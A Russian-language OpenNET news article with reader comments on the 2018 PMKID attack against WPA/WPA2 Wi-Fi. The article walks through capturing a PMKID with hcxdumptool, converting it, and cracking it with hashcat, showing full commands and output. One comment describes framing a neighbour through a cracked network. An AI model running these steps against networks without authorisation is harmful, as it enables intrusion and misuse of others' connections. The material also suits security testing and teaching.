The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Новая техника атаки на беспроводные сети с WPA2

12.08.2018 12:05

Йенс Штойбе (Jens "atom" Steube), создатель программы для подбора паролей hashcat, представил новую технику атаки на беспроводные сети с аутентификацией на базе механизмов WPA или WPA2. Предложенный метод существенно упрощает получение идентификатора, который затем может быть использован для подбора пароля подключения к беспроводной сети.

Атака применима к любым сетям 802.11i/p/q/r с включенным румингом (поддерживается на большинстве современных точек доступа). Суть метода в возможности получения идентификатора PMKID (Pairwise Master Key Identifier) в составе ответа EAPOL на запрос аутентификации (PMKID указывается в опциональном поле RSN IE (Robust Security Network Information Element)). Наличие PMKID позволяет определить разделяемый ключ PSK (Pre-Shared Key, пароль к беспроводной сети) без непосредственного получения вычисленного на его основе PMK (Pairwise Master Key), передаваемого на этапе согласования соединения при успешной аутентификации нового пользователя. В частности, PMKID вычисляется по формуле "HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)". Так как MAC-адреса и строка с названием сети изначально известны, не составляет труда применять PMKID вместо PMK в качестве признака успешного подбора пароля.

Атаки по подбору паролей на основе перехваченных кадров не новы, но в отличие от ранее применяемых методов новая атака не требует ожидания подключения к сети нового пользователя и сохранения всей активности, связанной с установкой им соединения. Для получения данных, достаточных для начала подбора пароля, новый метод требует перехвата лишь одного кадра, который можно получить в любое время, отправив запрос аутентификации к точке доступа. Подобная особенность существенно упрощает получение данных для начала подбора, но в целом успешность атаки как и раньше зависит от стойкости установленного пароля к подбору по словарю.

Отмечается, что большинство пользователей не утруждают себя установкой стойких к подбору паролей подключения к беспроводной сети или используют генерируемые точкой доступа пароли, которые на первый взгляд являются стойкими, но на деле формируются на основе предсказуемых шаблонов. Подобные пароли достаточно эффективно подбираются при знании информации о производителе точки доступа, которую можно получить, например, проанализировав MAC-адрес и ESSID. Время подбора подобных 10-символьных паролей оценивается примерно в 8 дней на системе с 4 GPU.

Для проведения атаки требуются свежие версии hcxdumptool, hcxtools и hashcat.

Запускаем hcxdumptool, отправляем запрос к точке доступа для получения PMKID и сохраняем результат в файл в формате pcapng


   ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

    start capturing (stop with ctrl+c)
    INTERFACE:...............: wlp39s0f3u4u5
    FILTERLIST...............: 0 entries
    MAC CLIENT...............: 89acf0e761f4 (client)
    MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
    EAPOL TIMEOUT............: 20000
    DEAUTHENTICATIONINTERVALL: 10 beacons
    GIVE UP DEAUTHENTICATIONS: 20 tries
    REPLAYCOUNTER............: 62083
    .... 
    [13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e  [ASSOCIATIONREQUEST, SEQUENCE 4]
    [13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
    [13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]

В случае если точка доступа поддерживает отправку PMKID будет выведено сообщение "FOUND PMKID". Из-за помех перехват может не получиться с первого раза, поэтому рекомендуется запускать hcxdumptool в течение приблизительно 10 минут.

Запускаем утилиту hcxpcaptool для преобразования перехваченного дампа из формата pcapng в формат для разбора в hashcat.


   ./hcxpcaptool -z test.16800 test.pcapng

    start reading from test.pcapng

    summary:
    --------
    file name....................: test.pcapng
    file type....................: pcapng 1.0
    file hardware information....: x86_64
    file os information..........: Linux 4.17.11-arch1
    file application information.: hcxdumptool 4.2.0
    network type.................: DLT_IEEE802_11_RADIO (127)
    endianess....................: little endian
    read errors..................: flawless
    packets inside...............: 66
    skipped packets..............: 0
    packets with FCS.............: 0
    beacons (with ESSID inside)..: 17
    probe requests...............: 1
    probe responses..............: 11
    association requests.........: 5
    association responses........: 5
    authentications (OPEN SYSTEM): 13
    authentications (BROADCOM)...: 1
    EAPOL packets................: 14
    EAPOL PMKIDs.................: 1

    1 PMKID(s) written to test.16800

Содержимое записанного файла включает строки вида "2582a81d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465af3a", которые содержат шестнадцатеричные значения PMKID, MAC AP,MAC Station и ESSID.

Дополнительно при запуске hcxpcaptool можно использовать опции "-E", "-I" и '-U" для анализа наличия паролей, идентификаторов и имён пользователей в беспроводном трафике:


   ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

Запускаем hashcat для подбора пароля (применяется режим 16800):


   ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

    hashcat (v4.2.0) starting...

    OpenCL Platform #1: NVIDIA Corporation
    ======================================
    * Device #1: GeForce GTX 1080, 2028/8112 MB allocatable, 20MCU
    * Device #2: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
    * Device #3: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
    * Device #4: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU

    Hashes: 1 digests; 1 unique digests, 1 unique salts
    Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

    Applicable optimizers:
    * Zero-Byte
    * Single-Hash
    * Single-Salt
    * Brute-Force
    * Slow-Hash-SIMD-LOOP

    Minimum password length supported by kernel: 8
    Maximum password length supported by kernel: 63

    Watchdog: Temperature abort trigger set to 90c

    2582573161c61*4604d4e*89acf0e761f4*ed4824639f3a:hashcat!

    Session..........: hashcat
    Status...........: Cracked
    Hash.Type........: WPA-PMKID-PBKDF2
    Hash.Target......: 2582a8281d0e61c61*4604ba734d4e*89acf...a39f3a
    Time.Started.....: Sun Aug 12 12:51:38 2018 (41 secs)
    Time.Estimated...: Sun Aug 12 12:52:19 2018 (0 secs)
    Guess.Mask.......: ?l?l?l?l?l?lt! [8]
    Guess.Queue......: 1/1 (100.00%)
    Speed.Dev.#1.....:   408.9 kH/s (103.86ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#2.....:   408.6 kH/s (104.90ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#3.....:   412.9 kH/s (102.50ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#4.....:   410.9 kH/s (104.66ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#*.....:  1641.3 kH/s
    Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
    Progress.........: 66846720/308915776 (21.64%)
    Rejected.........: 0/66846720 (0.00%)
    Restore.Point....: 0/11881376 (0.00%)
    Candidates.#1....: hariert! -> hhzkzet!
    Candidates.#2....: hdtivst! -> hzxkbnt!
    Candidates.#3....: gnxpwet! -> gwqivst!
    Candidates.#4....: gxhcddt! -> grjmrut!
    HWMon.Dev.#1.....: Temp: 81c Fan: 54% Util: 75% Core:1771MHz Mem:4513MHz Bus:1
    HWMon.Dev.#2.....: Temp: 81c Fan: 54% Util:100% Core:1607MHz Mem:4513MHz Bus:1
    HWMon.Dev.#3.....: Temp: 81c Fan: 54% Util: 94% Core:1683MHz Mem:4513MHz Bus:1
    HWMon.Dev.#4.....: Temp: 81c Fan: 54% Util: 93% Core:1620MHz Mem:4513MHz Bus:1




  1. Главная ссылка к новости (https://medium.com/@billbuchan...)
  2. OpenNews: Программа подбора паролей hashcat стала открытой
  3. OpenNews: OpenBSD отключает WEP и WPA1 по умолчанию
  4. OpenNews: Атака против WPA2, позволяющая перехватить трафик в WiFi-сети
  5. OpenNews: Опубликована технология защиты беспроводных сетей WPA3
  6. Проверка безопасности беспроводной сети WPA/WPA2 при помощи Aircrack-ng и Hashcat
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/49120-wpa
Ключевые слова: wpa, wpa2, wifi
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (65) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 13:18, 12/08/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –4 +/
    боюсь денег потраченных на 4х GeForce GTX 1080 хватит на оплату интернета на 15 лет как минимум. если вы поняли о чем я :)
     
     
  • 2.2, Аноним (2), 13:27, 12/08/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Да глючная точка доступа явно дешевле, чем 4•1080
     
  • 2.4, angra (ok), 13:33, 12/08/2018 [^] [^^] [^^^] [ответить]  
  • +14 +/
    А если атакующий не мамкин хацкер и цель не халявный интернет, а ресурсы внутренней сети фирмы?
     
     
  • 3.12, Аноним (12), 14:25, 12/08/2018 [^] [^^] [^^^] [ответить]  
  • +6 +/
    Это ж какие кретины во внутреннюю сеть с ценными данными по вайфаю пускают ?
     
     
  • 4.15, 123 (??), 14:35, 12/08/2018 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Русский бизнес.
     
     
  • 5.18, Я (??), 15:03, 12/08/2018 [^] [^^] [^^^] [ответить]  
  • +5 +/
    Или мамкин админ, который на "аутсорсе" херачит по быстренькой, чтобы бабла словить.

    А нерусский бизнес как-то по-другому делает?
    Думаю это зависит от серьёзности конторы. Если ты Васген с бутиком тухлей, то взлом точки доступа - не самая страшная потеря для твоего бизнеса. Пожарная инспекция больше на взятки заберёт. И серьёзные люди мудохаться с точкой доступа Васгена четыре дня не будут... Должна ли его волновать дырявость WPA2?

     
  • 4.17, Аноним (17), 14:45, 12/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Все у кого есть удаленный доступ.
    Так как нет способа проверить, вот этот хост с WiFi сидит, или в розетку проводом воткнулся.

    Да и доступ только к гостевым WiFi тоже много может рассказать.
    Например.
    Приходит в организацию, представитель другой организации.
    Ценные ли данные у этого представителя?
    Ценна ли инфа что эти две организации затевают что-то совместное?

     
  • 4.19, Crazy Alex (ok), 15:05, 12/08/2018 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Каждый первый примерно. Каждый второй - уж точно.Ноутбуки, смартфоны у всех.
     
     
  • 5.29, angra (ok), 18:18, 12/08/2018 [^] [^^] [^^^] [ответить]  
  • +13 +/
    Верно подмечено. Добавлю еще кучу устройств вроде переносных сканеров штрихкодов.
    А вот мамкины хацкеры живут в выдуманном мире, где офис каждой второй фирмы имеет защиту уровня правительственного бункера, а все остальные за серьезные конторы не считаются. Ничего, закончат школу, устроятся на работу и перед ними разверзнуться бездны. Окажется, что "правильно" не делают почти нигде и никогда.
     
     
  • 6.38, Maxim (??), 23:59, 12/08/2018 [^] [^^] [^^^] [ответить]  
  • –3 +/
    Подтверждаю

    Поэтому у нас 3 сети.
    Одна в которой есть доступ ко внутренним ресурсам.
    Вторая для сотрудников (интернет онли).
    Третья гостевой доступ в интернет.
    Пароли случайные символы от 20+ кроме гостевого.

     
     
  • 7.40, Аноним (40), 04:03, 13/08/2018 [^] [^^] [^^^] [ответить]  
  • +10 +/
    Записанные на бумажке приклеенной к монитору...
     
  • 7.50, _ (??), 10:41, 13/08/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    RADIUS, не не слышал
     
  • 4.46, Андрей (??), 08:54, 13/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Я скажу даже больше порой данные не такие уже и ценные! Ну сломаете вы wifi внутренний в пицерии, и что? Узнаете рецепт пиццы который написан в меню?
    Или скажем взломаете сеть колбасного комбината и таки бездна откроется перед вами в колбасу кладут бумагу! ААА мы все умрем!!! Незнаю как в России, на Украине по тихоньку все выходят из тени и стараются работать в белую, так что даже шантажировать особо не выйдет. А если контора работает в темную то как правило занесли столько денег, что человек который хочет по шантажировать, по поводу черной бухгалтерии, то человечка закроют быстрее чем проведут проверку на конторе.
    Для более мение крупных контор даже атаки шифровальщиков не страшны, зашифровало сервер, развернули бекап за 10 минут виртуалки и погнали дальше.
     
     
  • 5.57, Аноним (57), 11:46, 14/08/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    А если wifi подключен к системе управления тэц?
     
     
  • 6.59, Андрей (??), 15:52, 14/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    И чо? Вы были хоть раз на более-менее крупной тэц?
    Много там вайфая подключенного к управлению котлами и турбинами?

    Я вот проработал в энергетике 15 лет и знаю. А вы?

    Работать надо, а не интернеты читать!

     
     
  • 7.62, Аноним (62), 21:41, 14/08/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Работать надо, а не интернеты читать!

    А вы в таком случае что тут делаете?

     
  • 7.63, Аноним (57), 00:07, 15/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    А я почему вопрос задал, так просто что-ли?) И давайте не меряться стажем в энергетике - он у меня немного побольше вашего будет.
     
  • 5.68, Аноним (-), 20:37, 20/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > сломаете вы wifi внутренний в пицерии, и что? Узнаете рецепт пиццы
    > который написан в меню?

    Конкуренты с удовольствием заплатят за возможность вешать прямо через внутреннюю систему левые заказы оптом, сведения о планах, бухгалтерии, компромат и все такое. Ничего личного, это бизнес.

     
  • 5.70, SysA (?), 21:39, 28/01/2019 [^] [^^] [^^^] [ответить]  
  • +/
    A в пиццерии есть POS-терминалы по WiFi! ;)
     
  • 4.60, Аноним (60), 20:14, 14/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Например, те, чьё начальство арендовало кусок фойе бизнес-центра под стойку ресепшона. Сама фирма занимает одно крыло 3-го этажа, тянуть кабель арендодатель не разрешает, а доступ в корп. сеть девочкам на ресепшоне чтобы сегодня был.
     
  • 4.65, это что никнеймы теперь нужны аааа (?), 07:49, 16/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Много кто. В качестве примера можно привести одного известного вендора, в российской штаб-квартире которого вайфай раскинут абсолютно везде, и применяется как основной вариант последней мили для клиентских машин сотрудников.
     
  • 3.16, Я (??), 14:45, 12/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Наверное, точки доступа компании должны быть изолированы от внутренней сети. Ну, знаете, типа: я подключился к точке доступа, в интернет вижу, а в локальную сеть нет - только таких же оболтусов.
    А те точки доступа, что для внутренних сотрудников не должны выплёвывать сигнал на открытую территорию и должны быть доступны только в родных стенах. Силу сигнала то можно отрегулировать.
    В общем, вся эта херня со взломами конечно интересна для мамкиных хацкеров, а промышленный взлом с точками доступа к серьёзным конторам, это такая же пустая трата времени, как... пердеть в воду, что ли.

    А если вы наивный админ, который будет читать все эти новости про уязвимость WPA2, и прочие тонкости, и пытаться закрыть это на программном уровне - мне вас жаль. Просто не используйте этот канал связи, если он не надёжен - вот простая истина.

    Вообще, меня удивляют такие ребята, которые пытаются сделать самый безопасный, самый анонимный мессенджер, браузер, точку доступа...

    Есть простая древняя мудрость: Замки от добры людей - злых они не остановят.

     
     
  • 4.27, angra (ok), 18:06, 12/08/2018 [^] [^^] [^^^] [ответить]  
  • +5 +/
    Для начала попробуй объяснить элекромагнитным волнам, что они должны не выходить за какую-то там территорию. Без экранирования по периметру. Потом подумай о том, что серьезные конторы существуют не в вакууме. В офисы и даже на заводы заходят всевозможные посетители, от курьеров, до клиентов. И все они, о ужас, попадают на внутреннюю территорию. А еще, представь себе, индивидуальное здание под офис могут себе позволить далеко не все, большинство же снимает офис в каком-нибудь центре вместе с десятками других контор. Ну и наконец решение об использовании или неиспользовании wi-fi принимает не админ, админ его исполняет.

    >Есть простая древняя мудрость: Замки от добры людей - злых они не остановят.

    Нет ничего глупее подобных древних "мудростей". Интересно, а дверные замки в своей квартире ты уже убрал?

     
  • 4.42, Аноним (42), 07:28, 13/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    >Замки от добры людей - злых они не остановят.

    Гугл - корпорация добра, кстати.

     
     
  • 5.45, ыы (?), 07:56, 13/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    поэтому ее зонды не раздражают, а доставляют наслаждение....
     
  • 2.14, Аноним (17), 14:27, 12/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Поняли. Ты считаешь, что получение чужой учетки для доступа в сеть, нужно для доступа к общедоступным ресурсам интернет.

    Однако сеть это не значит интернет, а чужая учетка это возможность представиться персоной с определенными полномочиями. И т.д.

    P.S. "И т.д." - обозначает границы моих знаний.

     
  • 2.49, Ivan (??), 10:20, 13/08/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Зная точку доступа человека, на которого точишь зуб, можно с его точки, где ни будь, анонимно, загрузить картинку (из запрещенных по УК или текст), а потом под собой пожаловаться на нее (только с другого устройства), чтоб нужные люди, обратили на нее внимание и тогда, по идее, хозяину точки, предстоит не приятная беседа (а может и больше), с сотрудниками соответствующих организаций.
     

  • 1.3, Аноним (3), 13:31, 12/08/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +6 +/
    Прям странно видеть, что анонимам нужно объяснять, зачем ви-фи ломают... Уж точно не для того, чтобы в ВКшечке за чужой счёт сидеть.
     
     
  • 2.10, Андрей (??), 14:15, 12/08/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    у блин, к тупому бедному соседу Васяну приедет пативен из за того,что соседский крутой и богатый хацкер  с 4 Жирафами 1080, взломал Васянов Wi-Fi и с его ip высказал например нашему главстерху кучу гадостей и прочей правды жизни.
     
     
  • 3.21, Аноним (21), 16:23, 12/08/2018 [^] [^^] [^^^] [ответить]  
  • +8 +/
    Васян сам за это проголосовал
     
     
  • 4.23, threescarth (ok), 16:54, 12/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Тут речь о том Васяне, который как раз таки за это и не голосовал
     
     
  • 5.52, Аноним (52), 20:14, 13/08/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Ну может и не голосовал, но молчаливо согласился. Суть от этого не меняется. Но идея, документированная IBM как best practice больше десяти лет назад на поверхности: /31 на подключение с одним маршрутом до vpn-сервера. Пароль на точку опционален.
     
     
  • 6.69, SysA (?), 12:31, 25/11/2018 [^] [^^] [^^^] [ответить]  
  • +/
    /31?! Уверен?.. ;)
     
  • 2.33, Аноним (33), 19:06, 12/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Мисион импосибл какой оо прям лол
     

  • 1.5, iPony (?), 13:37, 12/08/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    А в WPA3 не прокатит?
     
  • 1.13, AnonPlus (?), 14:26, 12/08/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    В общем, если раньше надо было запустить пару команд в консоли, чтобы послать deauth подключённому пользователю, то теперь не нужно.

    Я правильно понимаю, что это вся разница? Так deauth послать вовсе нетрудно. У кого из домашних пользователей включена защита от деаутентификации, поднимите руки?

     
     
  • 2.22, Аноним (22), 16:25, 12/08/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    802.11w который в том числе защищает от deauth в openwrt есть давно и у меня давно включен.

    Тут суть скорее в том что к сети на момент скана никто не должен быть изначально подключен и может не быть активного трафика. На сколько я понял PMKID можно получить без какой либо авторизации просто при попытке подключения к сети.

     
     
  • 3.64, AnonPlus (?), 19:27, 15/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    >> в openwrt есть давно

    Давайте различать "в openwrt" и "в драйвере". В openwrt есть драйверы, в которых этого нет

     

  • 1.20, Аноним (20), 15:35, 12/08/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Как насчёт eap-tls?
     
     
  • 2.41, Аноним (41), 07:26, 13/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Тоже интересно.

    Мимо-шизик с wpa-eap дома.

     
     
  • 3.56, Аноним (-), 10:19, 14/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Ты ещё небось и руки моешь перед едой? Точно шизик!
     

  • 1.24, Аноним (33), 17:25, 12/08/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –3 +/
    Если компания маломальски серьёзная то макии используемых устройств будут в базе(кого подключать а кого нет). И доступы соответственно к ресурсам тоже будут разграничены :-)
    Ну и появление нового устройства в арп листе должно заставить охрану начать суетится.
     
     
  • 2.28, angra (ok), 18:11, 12/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Ну да, MAC ведь ну никак нельзя подделать. Это запрещает религия тех, кто доступ раздает по mac адресам. И мне бы хотелось посмотреть на контору в которой охрана мониторит mac адреса и начинает кипишь при появлении нового.
     
     
  • 3.31, Аноним (33), 18:56, 12/08/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Заходим в компанию связанную с военкой или другую подобную где участвует гостайна, и начинаем брутить...
    Далее нам расскажут про религию смены маков и т.д ;)

    Понятно что бутик Армэна это просто супер серьёзная контора ))))

     
  • 3.37, Аноним (33), 23:33, 12/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    А MAC где брать прикажете? Или надо для начала украсть у кого то ноутбук или планшет?
     
     
  • 4.39, Аноним (22), 02:33, 13/08/2018 [^] [^^] [^^^] [ответить]  
  • +4 +/
    Для Wi-Fi сети MAC адрес идёт в пакетах без шифрования в не зависимости от того как защищена сеть. Так что достаточно просто немного послушать трафик тем же airmon-ng для сбора всех адресов клиентов которые подключены к сети. Никакой физический доступ к оборудованию клиентов не нужен.
    А если нет поддержки managed frame protection то клиента можно просто выкинуть из сети и занять его место.
     
  • 4.47, Evgeny (??), 09:20, 13/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Введите команду arp.
     
  • 2.30, ыы (?), 18:30, 12/08/2018 [^] [^^] [^^^] [ответить]  
  • +3 +/
    >Ну и появление нового устройства в арп листе должно заставить охрану начать суетится.

    Колонка воскресного юмора :)

     
  • 2.51, soarin (ok), 14:55, 13/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Если компания маломальски серьёзная то макии используемых устройств будут в базе(кого подключать а кого нет)

    🛋

     
  • 2.66, А (??), 23:36, 17/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Странный критерий сереьзности компании.

    Как раз в серьезной количество станций в wifi сети больше 2-3 десятков, и сопровождать базу их MAC-ов просто неудобно.

    А вот EAP нормально приготовленный - это вполне себе признак. При этом, как на wifi разведённый, так и на проводных портах уровня доступа.

     

  • 1.25, Аноним (25), 17:54, 12/08/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Вообще-то перевод hcxdumptool wifi устройство должно быть переведено в режим monitor.
     
     
  • 2.26, Аноним (25), 17:55, 12/08/2018 [^] [^^] [^^^] [ответить]  
  • –2 +/
    А так норм перепечатка с хабра угу.
     

  • 1.32, Аноним (33), 19:00, 12/08/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Реально какой лошара будет такое делать?
     
  • 1.34, имя (?), 20:23, 12/08/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    ломайте, я даже дам подсказку -- 26 символов.
     
     
  • 2.44, КО (?), 07:50, 13/08/2018 [^] [^^] [^^^] [ответить]  
  • +2 +/
    А хеш от него какой длины хранится? А то, если 128 бит, то наверное, в пределах 16 символов есть коллизия, которая покороче ваших 26, а для входа тоже прокатывает. Но Вы про нее не знаете. :)
     
     
  • 3.48, имя (?), 09:29, 13/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Хороший вопрос. Используется aes ccm и tkip, вроде оба 128 бит?
    Однако, 16 символов тоже не мало..
     

  • 1.35, Аноним (35), 22:57, 12/08/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    М-да... После новости задумался, и от греха подальше поставил на точку whitelist MAC адресов и пароль усложнил.
     
     
  • 2.43, ыы (?), 07:42, 13/08/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >М-да... После новости задумался, и от греха подальше

    Как в анекдоте -
    "
    Век живи - век учись, подумал он и переложил серебряный портсигар из кармана брюк в нагрудный...
    "

    >поставил на точку whitelist MAC адресов и пароль усложнил.

    whitelist MAC адресов не является защитой.
    усложнение пароля - защита весьма условная...

     

  • 1.36, Аноним (36), 23:29, 12/08/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –3 +/
    > Время подбора подобных 10-символьных паролей оценивается примерно в 8 дней на системе с 4 GPU.

    Ну пусть попробует подобрать мой 32х-символьный - удачи, чо.

     
     
  • 2.53, Аноним (52), 20:16, 13/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Я бы подобрал, спасибо Амазону за аренду GPU по низким ценам. Но у тебя же нет ничего интересного. А даже если и есть, то проще бейсбольной битой по голени и ты сам всё расскажешь.
     
     
  • 3.54, др. Аноним (?), 21:46, 13/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    >> 32х-символьный
    > Я бы подобрал, спасибо Амазону за аренду GPU по низким ценам.
    > Но

    Но прогуливать математику-комбинаторику не следовало. Тогда бы мог прикинуть, с какой скоростью нужно перебирать 32^32/2 комбинаций, чтобы подобрать за приемлимое время.

    > проще бейсбольной битой по голени и ты сам всё расскажешь.

    С голой битой против лома? Ох уж эти теоретики …

     
     
  • 4.58, КО (?), 15:01, 14/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Ну вот еще, зачем так много. Достаточно подобрать любой длины, который будет генерить тот же хеш.
    Учитывая, что хеш гораздо короче, там может коллизия с паролем типа "1" будет.
     
  • 4.67, terrs (??), 18:56, 18/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    + SS ^)
     

  • 1.55, Аноним (55), 09:01, 14/08/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    новость нулевой пользы
     
     
  • 2.61, Аноним (61), 21:34, 14/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Как и комментарии к новости. Делай выводы.
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру